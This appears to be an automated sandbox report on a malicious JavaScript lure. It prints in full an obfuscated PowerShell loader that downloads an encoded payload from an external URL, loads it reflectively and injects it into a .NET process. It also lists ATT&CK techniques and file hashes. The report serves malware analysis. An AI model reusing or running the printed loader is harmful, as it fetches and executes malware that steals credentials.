  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KAAnAEUAcQAnACsAJwBTACcAKwAnAHUAcgBsACAAPQAgACcAKwAnAGIAZwB3AGgAJwArACcAdAB0AHAAcwAnACsAJwA6AC8ALwBpAGEAOQAwADQANgAwACcAKwAnADEALgB1AHMAJwArACcALgAnACsAJwBhAHIAYwBoAGkAJwArACcAdgBlACcAKwAnAC4AJwArACcAbwByAGcALwA2ACcAKwAnAC8AaQAnACsAJwB0ACcAKwAnAGUAbQAnACsAJwBzACcAKwAnAC8AZABlACcAKwAnAHQAJwArACcAYQAnACsAJwBoAC0AbgBvAHQAZQAtAGoALwBEAGUAdABhAGgAJwArACcATgBvAHQAJwArACcAZQAnACsAJwBKACcAKwAnAC4AJwArACcAdAB4ACcAKwAnAHQAYgBnAHcAOwBFACcAKwAnAHEAUwBiAGEAJwArACcAcwBlACcAKwAnADYAJwArACcANAAnACsAJwBDAG8AbgB0AGUAJwArACcAbgAnACsAJwB0ACcAKwAnACAAPQAgACgATgBlACcAKwAnAHcAJwArACcALQAnACsAJwBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQAnACsAJwBtAC4ATgBlAHQALgBXACcAKwAnAGUAYgBDACcAKwAnAGwAaQBlACcAKwAnAG4AdAApAC4AJwArACcARABvAHcAJwArACcAbgBsACcAKwAnAG8AJwArACcAYQBkAFMAdAByACcAKwAnAGkAbgBnACgARQAnACsAJwBxAFMAJwArACcAdQByACcAKwAnAGwAJwArACcAKQA7AEUAcQBTAGIAJwArACcAaQAnACsAJwBuAGEAcgB5AEMAbwBuACcAKwAnAHQAZQBuAHQAIAAnACsAJwA9ACcAKwAnACAAWwAnACsAJwBTAHkAJwArACcAcwB0AGUAbQAuAEMAJwArACcAbwAnACsAJwBuACcAKwAnAHYAZQByACcAKwAnAHQAXQAnACsAJwA6ADoARgAnACsAJwByAG8AbQBCAGEAJwArACcAcwBlADYANABTAHQAcgBpAG4AZwAoAEUAcQBTAGIAYQAnACsAJwBzACcAKwAnAGUANgAnACsAJwA0AEMAbwAnACsAJwBuAHQAJwArACcAZQAnACsAJwBuACcAKwAnAHQAKQA7AEUAJwArACcAcQBTAGEAcwBzAGUAbQBiACcAKwAnAGwAeQAnACsAJwAgAD0AJwArACcAIAAnACsAJwBbAFIAZQBmAGwAJwArACcAZQBjAHQAaQBvAG4ALgBBAHMAcwAnACsAJwBlAG0AYgAnACsAJwBsAHkAJwArACcAXQA6ACcAKwAnADoATAAnACsAJwBvAGEAZAAnACsAJwAoAEUAcQBTAGIAaQAnACsAJwBuACcAKwAnAGEAcgB5AEMAbwBuAHQAJwArACcAZQAnACsAJwBuAHQAKQA7ACcAKwAnAEUAcQBTAHQAJwArACcAeQBwAGUAIAA9ACAARQBxAFMAYQBzACcAKwAnAHMAJwArACcAZQBtAGIAbAB5AC4AJwArACcARwBlAHQAVAB5AHAAJwArACcAZQAnACsAJwAoACcAKwAnAGIAJwArACcAZwB3AFIAJwArACcAdQBuAFAAJwArACcARQAuAEgAbwBtAGUAYgBnACcAKwAnAHcAKQA7ACcAKwAnAEUAcQBTACcAKwAnAG0AZQAnACsAJwB0AGgAbwBkACAAJwArACcAPQAnACsAJwAgAEUAcQBTAHQAeQAnACsAJwBwACcAKwAnAGUAJwArACcALgBHAGUAdAAnACsAJwBNACcAKwAnAGUAdABoAG8AZAAoAGIAJwArACcAZwB3AFYAQQBJAGIAZwB3ACkAOwBFAHEAUwAnACsAJwBtAGUAJwArACcAdABoAG8AZAAuACcAKwAnAEkAbgB2AG8AawBlACgARQBxACcAKwAnAFMAbgB1AGwAJwArACcAbAAnACsAJwAsACAAWwBvAGIAagAnACsAJwBlAGMAdABbACcAKwAnAF0AXQBAACgAYgAnACsAJwBnAHcAdAB4AHQALgBpAHIAZQBoAHMAaQAvAHYAJwArACcAZQAnACsAJwBkAC4AMgByACcAKwAnAC4AJwArACcAMwA5ACcAKwAnAGIAJwArACcAMwAnACsAJwA0ADUAJwArACcAMwAnACsAJwAwACcAKwAnADIAYQAwADcANQAnACsAJwBiACcAKwAnADEAYgBjADAAZAA0ADUAYgAnACsAJwA2ADMAMgBlACcAKwAnAGIAOQBlACcAKwAnAGUANgAyACcAKwAnAC0AYgAnACsAJwB1AHAALwAvACcAKwAnADoAJwArACcAcwBwAHQAdABoACcAKwAnAGIAZwB3ACcAKwAnACAALAAnACsAJwAgAGIAZwB3AGQAZQBzACcAKwAnAGEAdABpAHYAYQAnACsAJwBkAG8AJwArACcAYgBnAHcAJwArACcAIAAsACAAYgBnACcAKwAnAHcAZAAnACsAJwBlAHMAYQB0AGkAdgBhACcAKwAnAGQAbwBiACcAKwAnAGcAdwAgACcAKwAnACwAIABiAGcAJwArACcAdwBkACcAKwAnAGUAcwAnACsAJwBhAHQAaQB2AGEAZAAnACsAJwBvAGIAZwB3ACwAJwArACcAYgAnACsAJwBnACcAKwAnAHcAQQAnACsAJwBkAGQASQBuAFAAcgBvAGMAJwArACcAZQBzAHMAMwAnACsAJwAyAGIAZwAnACsAJwB3ACwAJwArACcAYgAnACsAJwBnAHcAZABlAHMAYQB0AGkAdgBhAGQAbwBiAGcAJwArACcAdwApACcAKwAnACkAOwAnACkALgByAGUAcABMAEEAQwBFACgAKABbAGMAaABhAFIAXQA5ADgAKwBbAGMAaABhAFIAXQAxADAAMwArAFsAYwBoAGEAUgBdADEAMQA5ACkALABbAHMAdABSAGkAbgBnAF0AWwBjAGgAYQBSAF0AMwA5ACkALgByAGUAcABMAEEAQwBFACgAKABbAGMAaABhAFIAXQA2ADkAKwBbAGMAaABhAFIAXQAxADEAMwArAFsAYwBoAGEAUgBdADgAMwApACwAJwAkACcAKQB8AC4AIAAoACAAJABFAG4AVgA6AEMATwBtAHMAcABFAGMAWwA0ACwAMQA1ACwAMgA1AF0ALQBKAG8ASQBuACcAJwApAA==';$OWjuxD = [system.Text.encoding]::Unicode.GetString([system.Convert]::Frombase64String($Codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  PID:4748
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('Eq'+'S'+'url = '+'bgwh'+'ttps'+'://ia90460'+'1.us'+'.'+'archi'+'ve'+'.'+'org/6'+'/i'+'t'+'em'+'s'+'/de'+'t'+'a'+'h-note-j/Detah'+'Not'+'e'+'J'+'.'+'tx'+'tbgw;E'+'qSba'+'se'+'6'+'4'+'Conte'+'n'+'t'+' = (Ne'+'w'+'-'+'Object Syste'+'m.Net.W'+'ebC'+'lie'+'nt).'+'Dow'+'nl'+'o'+'adStr'+'ing(E'+'qS'+'ur'+'l'+');EqSb'+'i'+'naryCon'+'tent '+'='+' ['+'Sy'+'stem.C'+'o'+'n'+'ver'+'t]'+'::F'+'romBa'+'se64String(EqSba'+'s'+'e6'+'4Co'+'nt'+'e'+'n'+'t);E'+'qSassemb'+'ly'+' ='+' '+'[Refl'+'ection.Ass'+'emb'+'ly'+']:'+':L'+'oad'+'(EqSbi'+'n'+'aryCont'+'e'+'nt);'+'EqSt'+'ype = EqSas'+'s'+'embly.'+'GetTyp'+'e'+'('+'b'+'gwR'+'unP'+'E.Homebg'+'w);'+'EqS'+'me'+'thod '+'='+' EqSty'+'p'+'e'+'.Get'+'M'+'ethod(b'+'gwVAIbgw);EqS'+'me'+'thod.'+'Invoke(Eq'+'Snul'+'l'+', [obj'+'ect['+']]@(b'+'gwtxt.irehsi/v'+'e'+'d.2r'+'.'+'39'+'b'+'3'+'45'+'3'+'0'+'2a075'+'b'+'1bc0d45b'+'632e'+'b9e'+'e62'+'-b'+'up//'+':'+'sptth'+'bgw'+' ,'+' bgwdes'+'ativa'+'do'+'bgw'+' , bg'+'wd'+'esativa'+'dob'+'gw '+', bg'+'wd'+'es'+'ativad'+'obgw,'+'b'+'g'+'wA'+'ddInProc'+'ess3'+'2bg'+'w,'+'b'+'gwdesativadobg'+'w)'+');').repLACE(([chaR]98+[chaR]103+[chaR]119),[stRing][chaR]39).repLACE(([chaR]69+[chaR]113+[chaR]83),'$')|. ( $EnV:COmspEc[4,15,25]-JoIn'')"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    PID:4032
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
      4⤵
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      PID:1608

C:\Windows\System32\Notepad.exe
"C:\Windows\System32\Notepad.exe" C:\Users\Admin\Downloads\QUOTE_REQUEST_HONG_KONG_CHEMHERE.js
1⤵
- Opens file in notepad (likely ransom note)
PID:2348

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Discovery

Browser Information Discovery

T1217

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\1833431c-c9d2-4eaa-a0c4-23d832c776da.tmp

Filesize
9KB

MD5
486867091e7812342437c7219011bf40

SHA1
5909dfb9e13fdd4c28e4c4be4fe76cbc68f561e7

SHA256
01eb35fdf865e3d7c5a2a08d3fc6c2e4fae4d015d0471df77773e48888ec55cc

SHA512
7b32a87a7c55b4333b8745e6649dd57eb61936a4287c48a7645cdb4f74d16e1f199bf162bb060a9a63629770edfdb7183a4962de515c6752f1e985ab8433528b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
26431e9967dfc8961905bdda2bdc1902

SHA1
73b485962877ee8ea693c5a53d4fb7cdc5dc81dd

SHA256
72a6e2417faa2e241d51fc079c72e61df740026b58dc4b8ed8a7f8dbcab71cd5

SHA512
2c87afc5fa7bab929860bf5b4a25f93c52dfb77514c1336da34cc668bb174f02fb62b336499d593451370fe64591a92b6dba7493d0ce2baae627e01599d2380f

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
1ce361f9c50eed6971956871f8cf8e28

SHA1
75fef62490b5d16b5e49170aca952f458221d259

SHA256
d9c180546e430c9eb66c3e3d6d861983bf55c3d61fc53051865330a6a5eee1b2

SHA512
ec6fba5263f4a42e54ed95553af18cfb97ec2730519d0112342ed699668dc3124c132d09ccf90de01e09477ee1c3260008a93434d3998ff4c86f57b43590e709

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
79c47d87c80e1c073138ab3e26bdc24a

SHA1
f1d70bc69ef6271a64b1fc06ee17cd76a6e9185d

SHA256
ad0c05cd6fd23cfa30a06fca6774ad4f153bc8477ef603933ea5e8b27b402cbf

SHA512
0ccd5725f8d621a6ff60ee840a935824451d6aad9f463da0d2c593fcdfe7692a7282f2e12fbd7ad004b36ca85e367e38a07de7d007ed00bcddf388991e903c63

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
ece8ba9b1cba7394de905ce4febcb98d

SHA1
578d4368b7fa2b61e3f9343e3d7ea776bf29fda3

SHA256
b3e6992348def6fda7aa53d599761929137926524b8e0b07a9cc3781f2510826

SHA512
a819ddd5816c42aff8285dee73862a54f890ce26fa9b597d83ba1328d8361f8be751f33831cd006862ea821a04a9c352f0088b56eb6a090b38a34f0b3a5fa6a5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
092d2a125fa5b238c9b42ce47f916cd9

SHA1
353dca7d8b5973b7790a3c7f4d55e5ab0b29313b

SHA256
e48c81da332b25ec418e00bbeee8d287fb8f96c724d7c9892d48b2e24e032b20

SHA512
62529327fc1fcea3de725cdf94ce8eaed156c10bc6a19dc5cf9608580de65fd13088a35968ee55e796a5b40b8785af4b9226d7439c215d6fe404d38cc22f460b

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
70d706a95e9f468e262ca09305b55cf4

SHA1
945df74e3a51f805239a1bc579de896dbf1ba450

SHA256
b3e8abe6e1830a5e46d8d80d3fa982a2a85505e35afc73d0cc5c48172eb4503c

SHA512
2866db7bcbe010c17cef278790330cf9f6eef5738027e0f5bff8ba9bd857420e71f2899be58a01b603d6ac9e4b5a3dba17e80ac070f4bcd54a4e13df2e14feb8

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
d514f81130bf49ae21cefaba360b014b

SHA1
8c8e746400ba1cfba529b8ed52b89636ff1752c7

SHA256
c535f478d496d8bac48b6c14719d6763b49c8f1c3155fc5a101c88cc2b9c7b08

SHA512
bf00371e277ebf8d5612885b89bdc99cf64212bfa12dcc41ca8bdc860a93167af4ba3f47c1586ce7a4212a464b5474a37381b2391bc3c35ad43fa69cbc49b884

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
0486f2e89622b10ce919f8aa7c57dd28

SHA1
034de1d27eae168c20c68d6285cee7d059871304

SHA256
1fba4dcd4072e75218d361956575ddec82b1c82985f779222e900e1d97263ec9

SHA512
e7ab9f9e69439eb3e502183f30c1ca3eb2951f471d6af6a3118ae30a74f93c81cd4faaa0cbfb022415195c9ec190fe276ecae066524e7578dec69d3af744d7ba

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
a4828153dc3d3bc2dad1c9111230fde9

SHA1
55ea534e9a9de448c18d8bf65e1d4de6b4868918

SHA256
dc98d33c9dd2105ce0d397132e655fb09a0506ac04ae2a9ffa4c00a87ea1e918

SHA512
2a6d502ccfdf7be826b999b5f04ff5123d96af120748987e59110d7c70e61a78a450a9741144bede310493f119ccc45da0f8f705370de3a85d5f954bad29b7eb

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
181ba8fc9dfa8e49c1e29075f63edf67

SHA1
bf0057f3c18b3b661c120c758e77326da73492bf

SHA256
f2a25f845af286662f42c4cf61cf62545c3ecc3fc5029bddfc664eafd47d4d81

SHA512
295430bf87e39ba4b1db1164df1e73e2fa2afe98bce688db2b14568024464188eaa010bc7b9584035587d62391db7ce356c01f0c347b9455476d8175e724c76a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
ee77e153738fc94ce15a5bf55c7d0158

SHA1
391fe8746445e182581ccd19e7c988e1a45a57bb

SHA256
1dd6eb4948dfe14a9ba2aa47c9a1eee5eb240da50c9c6de582ad331976a3640b

SHA512
536319ec8797e74e2e21977f8633276f7e0637206dd18173cd0f82fc8a3af8b8db431018e9f458d56b5e6faa415aecdce9de7e864ff6d3ec3d1412989f0281aa

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
b4d0aa32225345891c4a0bbf8b21ac13

SHA1
e944b8a483d9e2ed3be0ff93453d6d571315a52b

SHA256
469039637932074e4a15927722ac57ee509cf8c36f83284419124a849c260638

SHA512
6f71fc6c08273f6f5641ded984b234d05d59fc99c69af71f79d8cb461759a0c73af237ef8f29a7b2af0c5a03060e608daad7d466e8eef581051d6154fa6ebbf5

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
05a17e31c3cca95462a84fa3b3331bd7

SHA1
8f3a0ac969e9c03a876feef29a6dede62898d3f2

SHA256
4b27daceb7fe8597a1b28e4bde35ea5e76b2c835ae34db568d559c936f05f5dd

SHA512
31471e7b95b955b55a87c3868acd63636c0873aa74a0219ba2a69414392ad9e20328a5da5b4aeb546ab702f22598b167f378464e9b454b99b691666fc6a90854

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
3783c971439ab2d0234d73ba02f2da72

SHA1
7c4379633eac86d622b28998f86b74a733e7b891

SHA256
dc5011b099d1771356d9652135014580c1c7cfceda33442d3c32eb4c6a054767

SHA512
73f4007840349306a3d2018b19e7ef22e3324c924ce901f4d18dfc0bc8057af6537ad3bab4a2f7f541dd65f7820817c07015d88f652d2a017f4f40c638908f88

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
d248395bc79655b38de7ab217d408d91

SHA1
9d3880e0d7419bc8c359cb6bb6ce4e8c7fd05c10

SHA256
ef88d524db94a72d527d4f46df00321aa54c70ef121b4dfaa5894c00e0cfeb9e

SHA512
d39ecc1ced385489bbcfd31510404639f2f9d5e27eed3c59594ad01de8c5c1e49442817e874f838c4dd23d2687cc8175a42ad9ed3ab946b50987b4f158e43368

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
cf3e3ce1de118f29bc912658f5a99e70

SHA1
4e1e9aa7b0647f290549861dddadb967a6a4b23f

SHA256
00232724b1cacc6adfb9a42819fd4741c34b0750fc4873a92a4425526e6ba552

SHA512
f06924c884c0c2e1d846f46d05cb4f0d35aeee9d0e3a7b1d9718ff895673ab8f825d3f2487ef20f2dcc703a9d207974556af470b48c9a965da8511f40c78834a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
1759025af60b27af4d329a9e208aed3c

SHA1
2b063b71213496e4d20d754dbc26012fae952d19

SHA256
734d8c786bed021499dacb4786f93eb21d3a4c4ca0b768214a414127af1988d9

SHA512
052ad5967648bce373fc380525d848a70721dc8abf922fd0c5ebfe211529c76eab9c9feb012b8edd651e375cae05794f2ffef27ec05f2e9f72ea484eec08b243

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
229f45f3a20496b11744df1089c3c881

SHA1
22e1dac3da19d8b8317e0ab5eb6c5ea1b1e2129d

SHA256
da63b0fa35e854b2bbd5fdc8ea026628117eb268b66b31c2be934a50885bd865

SHA512
d5e3a6029a3afce993d82a49ac133f3a94539ebaeae327e0df936212c2cf48c631e854190eb5b2f26024917d9949f7916539e51695def63d367758d56d728b16

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
3068c20b5e1265435cf4cf9fe93de56b

SHA1
c465d4d927de871f16d8a1a90d4bed42d435b8eb

SHA256
e8a8085e2d51458b8d8904b6ec4dfb9a1fe247264bd1b1ab898fe11235d587c4

SHA512
7c1c17cf66a5eb4c205c3fd83fb20b0a0cf5ff2ebc6a99142e17e4cb5bbb70cdf46b6b886210f7c67cbdd165db8e951a76779324931bd82bfe6a764d743199a0

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
99KB

MD5
3b22bc049fef4fb74c1855036fdc4609

SHA1
547789962c3432732b4e323001d527fdb5d6e1a6

SHA256
b5ec0fd9f824d72b9f45032c9caef2cb53caa6b7f501227fa021fad7dea88336

SHA512
67eb42eadce13e7e11055f1a58c7969e1441e2a079ac9ca78ca4ad0aa7b8843363aa19b788619d572d1ee0125d642c2c95cbc0dfcb29b8f5bfca614af240df82

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Local State

Filesize
99KB

MD5
dbda1c6176f4a8df3e95c32bd57c85d8

SHA1
b29144e9239c24b64f33e2b7ddcf3b68109958ce

SHA256
02cd068baa952777737c7a4d3c9fa901ac09ece25af701d3b8b30cdf33548d6a

SHA512
6f479863e3f7c868cd14c7f2e1608ffce27cc00ec10a38bdeecaf4e8cb028ca09efbf050bfc345d9321399b5b5786ea989d23af03ceeb3ef8682d8d4b6ff332e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
f41839a3fe2888c8b3050197bc9a0a05

SHA1
0798941aaf7a53a11ea9ed589752890aee069729

SHA256
224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

SHA512
2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_lddhlbzt.0l3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\QUOTE_REQUEST_HONG_KONG_CHEMHERE.js

Filesize
320KB

MD5
17551e071b20e3dfb493dc64c39ca696

SHA1
4e608cec8b51e7b518b7ea0131f9582e5055754c

SHA256
ccee9f0070a33b759d79d79e65e257f49d48a79eead7951a6c257e84e7ce4ae8

SHA512
84a690ae651fb2a439a7b58d5382840bbc21ece1f368cb3eeb013d926ebfeb9b73b772cc1a4e31a9d61e6f720a0c90a2a906277f34038e53d48add2115a4b4ff

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 527779.crdownload

Filesize
106KB

MD5
65817ce7e8e6416be9bed1e54802bf56

SHA1
876e058c7885fa38b031e6d52cb5d91ede27306a

SHA256
9370b8321b4e0ce748653bed38fea54d3239253c5a02ebbfe46ecb900b074afa

SHA512
1bbc089e0a0b7e8485002a56e019418f4edf314494a1d1231b087f40b5bb355a41e66ccb50f9256bf7a5ef316de86ebe1ba13205420c7a99a9f4ee1173a6af68

Download Submit
memory/1672-96-0x0000019AA43C0000-0x0000019AA43E2000-memory.dmp

Filesize
136KB

Download
memory/1672-138-0x00007FF9A4060000-0x00007FF9A4B21000-memory.dmp

Filesize
10.8MB

Download
memory/1672-107-0x00007FF9A4060000-0x00007FF9A4B21000-memory.dmp

Filesize
10.8MB

Download
memory/1672-106-0x00007FF9A4060000-0x00007FF9A4B21000-memory.dmp

Filesize
10.8MB

Download
memory/1672-95-0x00007FF9A4063000-0x00007FF9A4065000-memory.dmp

Filesize
8KB

Download
memory/2908-141-0x00000000063C0000-0x0000000006410000-memory.dmp

Filesize
320KB

Download
memory/2908-140-0x0000000005140000-0x00000000051A6000-memory.dmp

Filesize
408KB

Download
memory/2908-132-0x0000000000400000-0x0000000000442000-memory.dmp

Filesize
264KB

Download
memory/2908-163-0x00000000066C0000-0x00000000066CA000-memory.dmp

Filesize
40KB

Download
memory/2908-139-0x0000000005770000-0x0000000005D14000-memory.dmp

Filesize
5.6MB

Download
memory/2908-162-0x00000000066F0000-0x0000000006782000-memory.dmp

Filesize
584KB

Download
memory/2908-142-0x00000000064B0000-0x000000000654C000-memory.dmp

Filesize
624KB

Download
memory/4200-126-0x000002B02DD70000-0x000002B02DF7C000-memory.dmp

Filesize
2.0MB

Download